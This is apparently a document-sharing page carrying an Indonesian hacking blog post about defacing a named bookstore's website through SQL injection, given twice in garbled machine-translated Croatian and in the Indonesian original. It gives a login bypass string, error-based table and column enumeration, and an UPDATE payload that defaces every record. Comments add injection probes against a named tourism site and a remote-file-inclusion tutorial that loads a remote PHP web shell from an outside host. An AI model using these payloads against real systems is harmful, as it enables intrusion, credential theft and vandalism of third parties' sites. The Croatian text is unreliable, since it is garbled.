Kako Zbrisati Sql Injekcije Web Stranica Autralia Uništiti Indonesia
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Kako Zbrisati Sql Injekcije Web Stranica Autralia Uništiti Indonesia as PDF for free.
More details
- Words: 2,351
- Pages: 11
Kako zbrisati SQL injekcije web stranica autralia uništiti Indonesia Zamrljati klirens umjetnosti. Arts zamrljati = Utvrditi je haker u postojanje upoznati sami sebe, kako pronaći bugova / slabosti i kako ući u target sustava. Socijalne enginering je glavno uporište i ti bi trebala biti za "novi došljak 'haker. Zamrljati je glavni umjetnosti u kojem svaka osoba ima u tom osobina, možemo procijeniti da je razina ahlian haker u nejasnim. Hacker ima poseban pristup ključem koji pokazuje prednosti oni permahaman sa slijedećim: 1. Znate svoj cilj, cilj dijeliti moje osjećaje. 2. Provjerite jesu li naša srca, je u mogućnosti za napraviti krađa "srcu" sa target protok podataka kanale sa sposobnost društvenog enginering. 3. To je rekao: "dosta ceste prema Kini", ne mogu perforiran web, pokušajte aja LOE kupiti drugi agresivan poslužitelj sa cilj, moraju imati kapital coz emang no sada besplatno školovanje Sad 4. Pitajte isti marljiva prvak google "biblijske Hackers' www.google.com 5. Na vrhu planine, planina je još tamo, oni naučili mnoge stvari iz beskrajnog smo semampu Ja sam bio spreman, vrijeme je da isprobate, nakon samo TRY praksi pseudonim (do antičkih ali uistinu dovoljno snažni za istraživanje voće). Ova vježba u obuhvat VIROLOG.info, pokušajte, ako je kadaluarso Oprosti.
Id.wikipedia.org Hakiranje / Krekiranje: Besplatna knjiga Diface Što pomoći ????( SQL Injection-bug u Gramedia) By. 4L13N Posted by admin dana 2007/6/6 23:17:31 (1958 reads) Previous Ispričavamo Ama www.id.wikipedia.org NB: The Child Je li neiskusne slalu tako želim stvoriti majstor udeh oke aja lewatin! Subota 2-June-2007 10 malem zabavna sam surfati na lokacije www.id.wikipedia.org namjeri sey liat-liat knjiga odjednom imaju đavla bisikin "woi pokušajte dong neh site" tako pokušati platiti ga KAN? Kliknem yes udeh stranicu truz član SQL_Injection probati sa Username: admin Password: 'ili' = ' wah gileee može ići, ja nyangka site Gramedia razredu još bug Ama bogate Gini, dalem hati GW ngomong "admin woii
Zašto? hehe33x može kupiti knjigu besplatno neyyy" kaga 'Ah, GW ga' MW tako kaznene, logout aja Ah! ! opet, proklet vrag bisikin "Udeh zamrljati site !!!!" ehmm tuh gimana ya? udeh izvanredno odgovornost! Što neki način, to lijepo? Oiya, ažuriranje baze podataka aja ahh! vremena u potrazi za informacijama, JA OpenBSD: http://www.id.wikipedia.org/detil_newsevent.asp?id=06111010 2137 Što ću napraviti pogrešku tambahin citate jedan dielakang obogatili Gini: http://www.id.wikipedia.org/detil_newsevent.asp?id=06111010 2137 ' wahhh tamo, errornya! ahh ubrizgati Koje ime stol za naredbu colomnya n 'Imajući 1 = 1 -http://www.id.wikipedia.org/detil_newsevent.asp?id=06111010 2137 'Imajući 1 = 1 -DEH kluar error: [Microsoft] [ODBC SQL Server Driver] [SQL Server] Stupac 'td_newsevent.NEWSEVENT_ID' nije ispravan odabir u listu jer nije sadržana ni u jednoj skupnoj funkciju ili grupu klauzulu. wahh udaeh dapet naziv n kolum prvi stol "table name td_newsevent n NEWSEVENT_ID ime kolum" terusin ahh! Ja kolum pored mene na 'Group by kolum_name (NEWSEVENT_ID) http://www.id.wikipedia.org/detil_newsevent.asp?id=06111010 2137 'grupu td_newsevent.NEWSEVENT_ID -Error_Nya: [Microsoft] [ODBC SQL Server Driver] [SQL Server] Stupac 'td_newsevent.JUDUL' nije ispravan odabir u listu jer nije sadržana ni u jednoj skupnoj funkciju ili grupu klauzulu. Udeh dapet Ney kolum NASLOV petlje opet ahh! http://www.id.wikipedia.org/detil_newsevent.asp?id=06111010 2137 'grupu td_newsevent.NEWSEVENT_ID, naslov -Error_Nya: [Microsoft] [ODBC SQL Server Driver] [SQL Server] Stupac 'td_newsevent.PENULIS' nije ispravan odabir u listu jer nije sadržana ni u jednoj skupnoj funkciju ili grupu klauzulu. Wahh AUTOR kolum ovo vrijeme petlje lagihttp: / / www.id.wikipedia.org/detil_newsevent.asp?id=061110102137 'grupu td_newsevent.NEWSEVENT_ID, naslov, autor --
truz errornya: (ya sam udeh Cape ngetiknya ime glavnog kolum-kolumnya iniJ) NEWSEVENT_ID NASLOV AUTOR SAŽETAK OPIS STATUSWawwww informacije udeh dovoljno neyyy .... zamrljati, nejasnim, vrijeme je da se uvelo jedan database_nya ovdje na 'Ažuriraj nama_tabel postaviti nama_kolum =' Poruka '; -Gini obogatili: http://www.id.wikipedia.org/detil_newsevent.asp?id=06111010 2137 'update td_newsevent postaviti OPIS = " < "Font color = crveno> <" nadstrešnica> 4L13N Bug NAĐENO MOLIMO Patch Vaš sustav '; -Kok LW gak pake naredbu gdje sam? Opa ja sam lijen za to, iako svima lagian OPIS colum u tablici td_newsevent sudjelovati ter_Update sve Hehe33x! Sada je hasilnye ....: Gramedia knjižara najpopularnijih SE-Indonesia ukaza imate site koji se može precizirao jako jako ugroženi od haker napada čak i neiskusan jarić tko ga je bogata Što ja mogu !!!!>>- A samo da možemo laku'in od TIDAAAAKKK! Što može biti više: - Dodavanje sadržaja database_Nya .... Na 'Insert - SQL Server ... smrt. Pake naredbu; shutdown - Potražite korisničko ime admin password ... n za Uniju odaberite pretvoriti ATO - Član traže n korisničko ime lozinka - Nejasnim što svibanj biti jedan stranicu Nge_Remote - Mendelete baze podataka - Mnogo više dahhhh Cape neyy malem dah Kritik, Saran, bezobrazan dovraga n [email protected] mail da ti javim hvale Gospoda ke_ SWT N Rosul2xnya Topla pozdrav. 4L13N Explore posts in jednak kategorije: Hakiranje-Krekiranjecarding i pričekajte Ovaj ulaz je pošta na November 1, 2007 at 8:08 pm i je podnio pod Hakiranje-Krekiranje-carding i čekajte. Možete
se pretplatiti putem RSS 2.0 feed za ovaj post's comments. Možete komentar ispod, ili link na ovu trajnog URL iz vlastite web lokacije. 5 Komentari na "nagrditi: SQL Injection-Part 1" 1. joe kaže: Ožujak 4, 2008 at 8:56 mas .. To može stvoriti testiranje? http://www.gianyartourism.com/id.news.asp?lihat=detail&id=N 77668670 MrSinggih: Pokušajte ya mas ... http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id =A98435693 ' Microsoft JET Database Engine error'80040e14 ' Sintaktička pogreška u string izraza u upitu 'id_keg =' A98435693 ". / Id.agenda.asp, line 51 http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id =A98435693 'Having1 = 1 -Microsoft JET Database Engine error'80040e14 ' Syntax error (missing operator) in query expression 'id_keg =' A98435693'Having1 = 1 - ". / Id.agenda.asp, line 51 http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id =A98435693 'Grupiraj po id_keg'. A98435693 '-Microsoft JET Database Engine error'80040e14 ' Sintaktička pogreška u string izraza u upitu 'id_keg'. A98435693' ". / Id.agenda.asp, line 51 ... Ff. :-) :-) Kasnije sam prenošljivost no mas. Pokušajte na svoj tečaj. Monggo Odgovoriti
2. Singgih Kumoro kaže: Ožujak 27, 2008 at 12:48 Tutorial Kako zamrljati udoban i tenan Enak ... 1. Http: / / www.milw0rm otvoren. com 2. kliknite Traži 3. Vrsta RFI (Remote File inclusion) 4. Traži iskorištavati ili CMS / Programi poznati 5. Idi na Google i liat Savjetničkog smo odabrali 6. * Ako je Dork [ključne riječi Google] Dork ga koristiti, u * Ako ne koristite više od iskorištavati 7. Nakon Googleove rezultate možete desnom tipkom miša kliknite Otvori NewTab [Nah ovom Srećom, njegova Pake Firefox, IE, ali može imati najnoviju verziju Open NewTAB] 8. Otvori kontinuirano od List/Daftar2 pronađeno od Googlea, dok ne Osjećaj punog Browsernya 9. Isprobajte jedan po jedan iz rezultata s Command iskorištavati pronaći u savjetniku 10. Ako su poruke o pogreškama, traži da se poruka o pogrešci File inclusion neuspjeh, a ne File not found. 11. Ako vam File Not Found mogućnost; relativni put from the Site, ili različite verzije, a možda drugima. 12. Ako vam poruku o pogrešci datoteke inkluzije, odnosno Blank White bez poruka o pogrešci, 13. Promijeni iskoristiti naredba nakon '=' [ista] s http://bugs.byethost32.com/php3.txt? [phpshell su OL / U] 14. Da biste vidjeli ekran, da li je stranica i uspješno izvršavanje Prikaži samo PHPShell r57shell ili prazne stranice, i pojavljuje se povratak File inclusion 15. Ako se stranice uspješno dovesti r57shell [phpshell] nastaviti Pretraživanje datoteka i Direktory da ima potpuni pristup ili-rwxrwxrwx /-RW-RW-RW <- za datoteke | drwxrwxrwx /-RW DRW-RW <- za direktory
16. Ako već imate neku datoteku ili direktory gore, a vi mogu učitati datoteke index.html u verziji koju je napravio, ili za promjenu index.php ili. HTML code s verzijom ste zaboravili ime jgn dekodiranje dikibarkan tamo ... 17. Nakon mijenjanja datoteke. Pokušajte vi vidite u pregledniku, u skladu relatife put s promjenom pred vama (Izvorni post by ping_win) Odgovoriti Cara deface web sql injection Indonesia hancurkan situs autralia Deface membutuh seni. Seni Deface=sebuah identify of hacker dalam memperkenalkan eksistensi diri, bagaiman menemukan bug/kelemahan dan cara masuk ke system target. Pengertian sosial enginering merupakan hal utama dan dasar yg harus dipelajari bagi ‘new comer’ hacker. Deface ialah seni utama dimana setiap orang memiliki ciri tersendiri dalam melakukannya, kita dapat menilai tingkat ke ahlian sang hacker dalam deface. Hacker memiliki kunci spesial akses yang menunjukan kelebihan mereka dengan permahaman sbb: 1. Kenali target mu, tujuannya berbagi perasaan sayang. 2. Yakinkan hati kita, mampu kah mencuri “hati” target dengan saluran aliran data dengan kemampuan sosial enginering. 3. Ada pepatah “banyak jalan menuju China” Tidak bisa tembus web, coba aja loe beli hosting yg satu server dengan target, emang harus bermodal coz no education free now Sad 4. Rajin bertanya sama mbah google “alkitab hacker’ www.google.com 5. Di atas gunung masih ada gunung, maka belajarlah banyak dari hal yang tak terhingga, semampu kita Kalo sudah siap, saatnya dicoba, berikut ini hanya sebatas TRY alias latihan (memang sih cara kuno tapi cukup ampuh buah belajar). Latihan ini di ambil dari VIROLOG.info , silahkan dicoba, Maaf jika sudah kadaluarso. Hacking/Cracking : Beli Buku Gratis Apa Diface Yach????(SQL-Injection bug in gramedia) By. 4L13N Posted by admin on 2007/6/6 23:17:31 (1958 reads) Sebelumnya Gw minta maaf Ama www.id.wikipedia.org NB: Gw Cuma Anak Ingusan Yang slalu ingin tau jadi buat yang udeh master lewatin aja oke!!!!Sabtu 2-juni-2007 jam 10 malem Iseng-iseng gw surfing ke situs www.id.wikipedia.org niatnya sey liat-liat buku tiba-tiba ada setan yang bisikin “woi coba dong neh situs” iya coba-coba ga bayar kan???? ya udeh gw klik halaman member truz gw coba pake SQL_Injection dengan username: admin Password: ‘or ”=’
wah gileee bisa masuk, gak nyangka situs sekelas gramedia masih kena ama bug’s kaya gini, dalem hati gw ngomong “woii admin Why???hehe33x bisa beli buku gratis neyyy” kaga’ ah, gw ga’ mw jadi kriminal, logout aja ah!!! lagi-lagi, setan keparat bisikin “Udeh deface tuh situs!!!!” ehmm gimana ya?? udeh kepalang tanggung!! pake cara apa ya, yang enak???Oiya, Update database server aja ahh!!! saatnya mencari informasi, gw buka: http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137 buat nyari error gw tambahin tanda kutip satu dielakang jadinya kaya gini: http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137‘ wahhh ada, errornya!!! inject ahh buat nyari nama tabel n colomnya pake perintah ‘Having 1=1– http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137‘Having 1=1– kluar error deh : [Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘td_newsevent.NEWSEVENT_ID’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. wahh udaeh dapet nama tabel n kolum pertamanya “td_newsevent nama tabel n NEWSEVENT_ID nama kolum” terusin ahh!!! untuk tau kolum berikutnya gw pake perintah ‘Group+by+kolum_name(NEWSEVENT_ID) http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137%20‘group%20by% 20td_newsevent.NEWSEVENT_ID– Error_Nya : [Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘td_newsevent.JUDUL’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Udeh dapet ney kolum JUDUL looping lagi ahh!!! http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137%20‘group%20by% 20td_newsevent.NEWSEVENT_ID,JUDUL– Error_Nya : [Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘td_newsevent.PENULIS’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Wahh kali ini kolum PENULIS gw looping lagihttp://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137%20‘group%20b y%20td_newsevent.NEWSEVENT_ID,JUDUL,PENULIS– truz errornya: (udeh ya gw cape ngetiknya pokoknya nama kolum-kolumnya iniJ ) NEWSEVENT_ID JUDUL PENULIS
SUMMARY DESCRIPTION STATUSWawwww Informasinya udeh cukup neyyy…. deface-deface, tiba saatnya untuk menginjeksi database_nya disini gw pake perintah ‘Update+nama_tabel+set+nama_kolum=’pesan’;– jadinya kaya gini: http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137%20‘update+td_new sevent+set+DESCRIPTION=” <”font%20color=red><”marquee>4L13N%20FOUND%20BUG%20PLEASE%20PATC H%20YOUR%20SYSTEM ‘;– Kok lw gak pake perintah where sich??? Wah Gw terlalu malas untuk itu, lagian biar semua colum DESCRIPTION yang ada di tabel td_newsevent ikut ter_Update semuanya Hehe33x!! Nah ini dia hasilnye….:Gramedia toko buku paling populer se-Indonesia ternyata mempunyai situs yang bisa dibilang amat sangat rentan dari serangan hacker bahkan bocah ingusan yang ga’ tau apa-apa kaya gw juga bisa!!!!>>-A Apa cuma itu yang bisa kita laku’in tentu TIDAAAAKKK!!!! kalo ditelusuri lagi kita bisa : - Menambahkan isi database_Nya….pake perintah ‘Insert - mematikan Sql server….pake perintah ;shutdown - mencari username admin n passwordnya… pake perintah union+select ato convert - mencari username member n passwordnya - deface satu halaman ato mungkin Nge_Remote - mendelete database - masih banyak lagi dahhhh cape neyy dah malem Kritik,Saran,Cacian n Makian mail To [email protected] kalo pujian kirim ke_ ALLAH SWT N Rosul2xnya Salam Hangat By. 4L13N Explore posts in the same categories: Hacking-Cracking-Carding dan Sejenisnya This entry was posted on Nopember 1, 2007 at 8:08 am and is filed under HackingCracking-Carding dan Sejenisnya. You can subscribe via RSS 2.0 feed to this post's comments. You can comment below, or link to this permanent URL from your own site. 5 Comments on “Deface: SQL Injection Part-1” 1. joe Says: Maret 4, 2008 at 8:56 am
mas.. ini bisa buat testing gak? http://www.gianyartourism.com/id.news.asp?lihat=detail&id=N77668670 MrSinggih : Coba ya mas … http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id=A98435693‘ Microsoft JET Database Engine error ‘80040e14′ Syntax error in string in query expression ‘id_keg=’A98435693”’. /id.agenda.asp, line 51 http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id=A98435693‘Having1 =1Microsoft JET Database Engine error ‘80040e14′ Syntax error (missing operator) in query expression ‘id_keg=’A98435693′Having1=1-”. /id.agenda.asp, line 51 http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id=A98435693‘Group% 20by%20id_keg.’A98435693′Microsoft JET Database Engine error ‘80040e14′ Syntax error in string in query expression ‘id_keg.’A98435693′-”. /id.agenda.asp, line 51 Dst…. :-) :-) Nanti saya ndak keterusan mas. Di coba sendiri saja. Monggo Balas 2. Singgih Kumoro Says: Maret 27, 2008 at 12:48 am Tutorial Cara deface yang Nyaman dan Enak Tenan … 1. Buka http://www.milw0rm. com 2. klik Search 3. ketik RFI (Remote File Inclusion) 4. Cari Exploit terbaru atau CMS/Aplikasi yang terkenal 5. Buka Google, dan liat Advisor yang kita pilih tersebut 6. * Jika terdapat DORK[kata kunci google] gunakan lah Dork tersebut, * Jika tidak gunakanlah Judul dari Exploit tersebut 7. Setelah dapat hasil dari Google, klik kanan Open NewTab [Nah ini untung nya Pake Firefox, tapi IE versi terbaru sudah bisa Open NewTAB] 8. Buka terus dari List/Daftar2 yang terdapat dari google, hingga kamu rasa penuh Browsernya 9. Coba satu persatu dari hasil tersebut dengan Exploit Command yang
terdapat di advisor 10. Jika terjadi pesan error, cari Pesan error yang menyatakan kegagalan File Inclusion, bukan File Not Found. 11. Jika menemukan File Not Found kemungkinan; salah Relative Path dari Site tersebut, atau memang beda versi, dan kemungkinan lain. 12. Jika menemukan pesan error dari File Inclusion, atau Blank Putih tanpa Pesan Error, 13. Ganti command exploit setelah tanda ‘=’[sama dengan] dengan http://bugs.byethost32.com/php3.txt? [phpshell yang OL/Aktif] 14. Lihat ke Layar, apakah site tersebut berhasil mengeksekusi dan menampilkan PHPShell r57shell atau hanya Blank Page, dan muncul kembali File Inclusion 15. Jika site berhasil memunculkan r57shell [phpshell] lanjutkan ke pencarian File dan Direktory yang memiliki full akses atau -rwxrwxrwx / -rw-rw-rw <– untuk file | drwxrwxrwx / drw-rw-rw <– untuk direktory 16. Jika telah mendapatkan file atau direktory diatas tersebut, kamu bisa mengupload file index.html versi buatan kamu, atau mengubah index.php or .html dengan versi code kamu jgn lupa nama decoding dikibarkan disana… 17. Setelah merubah file tersebut. Coba kamu lihat di browser sesuai dengan relatife path yang kamu ubah tadi (Original post by ping_win) Balas
Id.wikipedia.org Hakiranje / Krekiranje: Besplatna knjiga Diface Što pomoći ????( SQL Injection-bug u Gramedia) By. 4L13N Posted by admin dana 2007/6/6 23:17:31 (1958 reads) Previous Ispričavamo Ama www.id.wikipedia.org NB: The Child Je li neiskusne slalu tako želim stvoriti majstor udeh oke aja lewatin! Subota 2-June-2007 10 malem zabavna sam surfati na lokacije www.id.wikipedia.org namjeri sey liat-liat knjiga odjednom imaju đavla bisikin "woi pokušajte dong neh site" tako pokušati platiti ga KAN? Kliknem yes udeh stranicu truz član SQL_Injection probati sa Username: admin Password: 'ili' = ' wah gileee može ići, ja nyangka site Gramedia razredu još bug Ama bogate Gini, dalem hati GW ngomong "admin woii
Zašto? hehe33x može kupiti knjigu besplatno neyyy" kaga 'Ah, GW ga' MW tako kaznene, logout aja Ah! ! opet, proklet vrag bisikin "Udeh zamrljati site !!!!" ehmm tuh gimana ya? udeh izvanredno odgovornost! Što neki način, to lijepo? Oiya, ažuriranje baze podataka aja ahh! vremena u potrazi za informacijama, JA OpenBSD: http://www.id.wikipedia.org/detil_newsevent.asp?id=06111010 2137 Što ću napraviti pogrešku tambahin citate jedan dielakang obogatili Gini: http://www.id.wikipedia.org/detil_newsevent.asp?id=06111010 2137 ' wahhh tamo, errornya! ahh ubrizgati Koje ime stol za naredbu colomnya n 'Imajući 1 = 1 -http://www.id.wikipedia.org/detil_newsevent.asp?id=06111010 2137 'Imajući 1 = 1 -DEH kluar error: [Microsoft] [ODBC SQL Server Driver] [SQL Server] Stupac 'td_newsevent.NEWSEVENT_ID' nije ispravan odabir u listu jer nije sadržana ni u jednoj skupnoj funkciju ili grupu klauzulu. wahh udaeh dapet naziv n kolum prvi stol "table name td_newsevent n NEWSEVENT_ID ime kolum" terusin ahh! Ja kolum pored mene na 'Group by kolum_name (NEWSEVENT_ID) http://www.id.wikipedia.org/detil_newsevent.asp?id=06111010 2137 'grupu td_newsevent.NEWSEVENT_ID -Error_Nya: [Microsoft] [ODBC SQL Server Driver] [SQL Server] Stupac 'td_newsevent.JUDUL' nije ispravan odabir u listu jer nije sadržana ni u jednoj skupnoj funkciju ili grupu klauzulu. Udeh dapet Ney kolum NASLOV petlje opet ahh! http://www.id.wikipedia.org/detil_newsevent.asp?id=06111010 2137 'grupu td_newsevent.NEWSEVENT_ID, naslov -Error_Nya: [Microsoft] [ODBC SQL Server Driver] [SQL Server] Stupac 'td_newsevent.PENULIS' nije ispravan odabir u listu jer nije sadržana ni u jednoj skupnoj funkciju ili grupu klauzulu. Wahh AUTOR kolum ovo vrijeme petlje lagihttp: / / www.id.wikipedia.org/detil_newsevent.asp?id=061110102137 'grupu td_newsevent.NEWSEVENT_ID, naslov, autor --
truz errornya: (ya sam udeh Cape ngetiknya ime glavnog kolum-kolumnya iniJ) NEWSEVENT_ID NASLOV AUTOR SAŽETAK OPIS STATUSWawwww informacije udeh dovoljno neyyy .... zamrljati, nejasnim, vrijeme je da se uvelo jedan database_nya ovdje na 'Ažuriraj nama_tabel postaviti nama_kolum =' Poruka '; -Gini obogatili: http://www.id.wikipedia.org/detil_newsevent.asp?id=06111010 2137 'update td_newsevent postaviti OPIS = " < "Font color = crveno> <" nadstrešnica> 4L13N Bug NAĐENO MOLIMO Patch Vaš sustav '; -Kok LW gak pake naredbu gdje sam? Opa ja sam lijen za to, iako svima lagian OPIS colum u tablici td_newsevent sudjelovati ter_Update sve Hehe33x! Sada je hasilnye ....: Gramedia knjižara najpopularnijih SE-Indonesia ukaza imate site koji se može precizirao jako jako ugroženi od haker napada čak i neiskusan jarić tko ga je bogata Što ja mogu !!!!>>- A samo da možemo laku'in od TIDAAAAKKK! Što može biti više: - Dodavanje sadržaja database_Nya .... Na 'Insert - SQL Server ... smrt. Pake naredbu; shutdown - Potražite korisničko ime admin password ... n za Uniju odaberite pretvoriti ATO - Član traže n korisničko ime lozinka - Nejasnim što svibanj biti jedan stranicu Nge_Remote - Mendelete baze podataka - Mnogo više dahhhh Cape neyy malem dah Kritik, Saran, bezobrazan dovraga n [email protected] mail da ti javim hvale Gospoda ke_ SWT N Rosul2xnya Topla pozdrav. 4L13N Explore posts in jednak kategorije: Hakiranje-Krekiranjecarding i pričekajte Ovaj ulaz je pošta na November 1, 2007 at 8:08 pm i je podnio pod Hakiranje-Krekiranje-carding i čekajte. Možete
se pretplatiti putem RSS 2.0 feed za ovaj post's comments. Možete komentar ispod, ili link na ovu trajnog URL iz vlastite web lokacije. 5 Komentari na "nagrditi: SQL Injection-Part 1" 1. joe kaže: Ožujak 4, 2008 at 8:56 mas .. To može stvoriti testiranje? http://www.gianyartourism.com/id.news.asp?lihat=detail&id=N 77668670 MrSinggih: Pokušajte ya mas ... http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id =A98435693 ' Microsoft JET Database Engine error'80040e14 ' Sintaktička pogreška u string izraza u upitu 'id_keg =' A98435693 ". / Id.agenda.asp, line 51 http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id =A98435693 'Having1 = 1 -Microsoft JET Database Engine error'80040e14 ' Syntax error (missing operator) in query expression 'id_keg =' A98435693'Having1 = 1 - ". / Id.agenda.asp, line 51 http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id =A98435693 'Grupiraj po id_keg'. A98435693 '-Microsoft JET Database Engine error'80040e14 ' Sintaktička pogreška u string izraza u upitu 'id_keg'. A98435693' ". / Id.agenda.asp, line 51 ... Ff. :-) :-) Kasnije sam prenošljivost no mas. Pokušajte na svoj tečaj. Monggo Odgovoriti
2. Singgih Kumoro kaže: Ožujak 27, 2008 at 12:48 Tutorial Kako zamrljati udoban i tenan Enak ... 1. Http: / / www.milw0rm otvoren. com 2. kliknite Traži 3. Vrsta RFI (Remote File inclusion) 4. Traži iskorištavati ili CMS / Programi poznati 5. Idi na Google i liat Savjetničkog smo odabrali 6. * Ako je Dork [ključne riječi Google] Dork ga koristiti, u * Ako ne koristite više od iskorištavati 7. Nakon Googleove rezultate možete desnom tipkom miša kliknite Otvori NewTab [Nah ovom Srećom, njegova Pake Firefox, IE, ali može imati najnoviju verziju Open NewTAB] 8. Otvori kontinuirano od List/Daftar2 pronađeno od Googlea, dok ne Osjećaj punog Browsernya 9. Isprobajte jedan po jedan iz rezultata s Command iskorištavati pronaći u savjetniku 10. Ako su poruke o pogreškama, traži da se poruka o pogrešci File inclusion neuspjeh, a ne File not found. 11. Ako vam File Not Found mogućnost; relativni put from the Site, ili različite verzije, a možda drugima. 12. Ako vam poruku o pogrešci datoteke inkluzije, odnosno Blank White bez poruka o pogrešci, 13. Promijeni iskoristiti naredba nakon '=' [ista] s http://bugs.byethost32.com/php3.txt? [phpshell su OL / U] 14. Da biste vidjeli ekran, da li je stranica i uspješno izvršavanje Prikaži samo PHPShell r57shell ili prazne stranice, i pojavljuje se povratak File inclusion 15. Ako se stranice uspješno dovesti r57shell [phpshell] nastaviti Pretraživanje datoteka i Direktory da ima potpuni pristup ili-rwxrwxrwx /-RW-RW-RW <- za datoteke | drwxrwxrwx /-RW DRW-RW <- za direktory
16. Ako već imate neku datoteku ili direktory gore, a vi mogu učitati datoteke index.html u verziji koju je napravio, ili za promjenu index.php ili. HTML code s verzijom ste zaboravili ime jgn dekodiranje dikibarkan tamo ... 17. Nakon mijenjanja datoteke. Pokušajte vi vidite u pregledniku, u skladu relatife put s promjenom pred vama (Izvorni post by ping_win) Odgovoriti Cara deface web sql injection Indonesia hancurkan situs autralia Deface membutuh seni. Seni Deface=sebuah identify of hacker dalam memperkenalkan eksistensi diri, bagaiman menemukan bug/kelemahan dan cara masuk ke system target. Pengertian sosial enginering merupakan hal utama dan dasar yg harus dipelajari bagi ‘new comer’ hacker. Deface ialah seni utama dimana setiap orang memiliki ciri tersendiri dalam melakukannya, kita dapat menilai tingkat ke ahlian sang hacker dalam deface. Hacker memiliki kunci spesial akses yang menunjukan kelebihan mereka dengan permahaman sbb: 1. Kenali target mu, tujuannya berbagi perasaan sayang. 2. Yakinkan hati kita, mampu kah mencuri “hati” target dengan saluran aliran data dengan kemampuan sosial enginering. 3. Ada pepatah “banyak jalan menuju China” Tidak bisa tembus web, coba aja loe beli hosting yg satu server dengan target, emang harus bermodal coz no education free now Sad 4. Rajin bertanya sama mbah google “alkitab hacker’ www.google.com 5. Di atas gunung masih ada gunung, maka belajarlah banyak dari hal yang tak terhingga, semampu kita Kalo sudah siap, saatnya dicoba, berikut ini hanya sebatas TRY alias latihan (memang sih cara kuno tapi cukup ampuh buah belajar). Latihan ini di ambil dari VIROLOG.info , silahkan dicoba, Maaf jika sudah kadaluarso. Hacking/Cracking : Beli Buku Gratis Apa Diface Yach????(SQL-Injection bug in gramedia) By. 4L13N Posted by admin on 2007/6/6 23:17:31 (1958 reads) Sebelumnya Gw minta maaf Ama www.id.wikipedia.org NB: Gw Cuma Anak Ingusan Yang slalu ingin tau jadi buat yang udeh master lewatin aja oke!!!!Sabtu 2-juni-2007 jam 10 malem Iseng-iseng gw surfing ke situs www.id.wikipedia.org niatnya sey liat-liat buku tiba-tiba ada setan yang bisikin “woi coba dong neh situs” iya coba-coba ga bayar kan???? ya udeh gw klik halaman member truz gw coba pake SQL_Injection dengan username: admin Password: ‘or ”=’
wah gileee bisa masuk, gak nyangka situs sekelas gramedia masih kena ama bug’s kaya gini, dalem hati gw ngomong “woii admin Why???hehe33x bisa beli buku gratis neyyy” kaga’ ah, gw ga’ mw jadi kriminal, logout aja ah!!! lagi-lagi, setan keparat bisikin “Udeh deface tuh situs!!!!” ehmm gimana ya?? udeh kepalang tanggung!! pake cara apa ya, yang enak???Oiya, Update database server aja ahh!!! saatnya mencari informasi, gw buka: http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137 buat nyari error gw tambahin tanda kutip satu dielakang jadinya kaya gini: http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137‘ wahhh ada, errornya!!! inject ahh buat nyari nama tabel n colomnya pake perintah ‘Having 1=1– http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137‘Having 1=1– kluar error deh : [Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘td_newsevent.NEWSEVENT_ID’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. wahh udaeh dapet nama tabel n kolum pertamanya “td_newsevent nama tabel n NEWSEVENT_ID nama kolum” terusin ahh!!! untuk tau kolum berikutnya gw pake perintah ‘Group+by+kolum_name(NEWSEVENT_ID) http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137%20‘group%20by% 20td_newsevent.NEWSEVENT_ID– Error_Nya : [Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘td_newsevent.JUDUL’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Udeh dapet ney kolum JUDUL looping lagi ahh!!! http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137%20‘group%20by% 20td_newsevent.NEWSEVENT_ID,JUDUL– Error_Nya : [Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘td_newsevent.PENULIS’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Wahh kali ini kolum PENULIS gw looping lagihttp://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137%20‘group%20b y%20td_newsevent.NEWSEVENT_ID,JUDUL,PENULIS– truz errornya: (udeh ya gw cape ngetiknya pokoknya nama kolum-kolumnya iniJ ) NEWSEVENT_ID JUDUL PENULIS
